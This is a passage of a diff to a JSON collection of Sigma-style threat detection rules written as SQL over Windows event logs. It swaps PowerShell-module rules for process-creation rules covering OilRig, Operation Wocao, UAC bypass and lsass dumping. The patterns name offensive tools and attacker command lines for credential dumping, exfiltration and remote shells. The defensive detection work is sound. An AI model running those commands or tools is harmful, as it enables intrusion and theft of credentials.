Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' 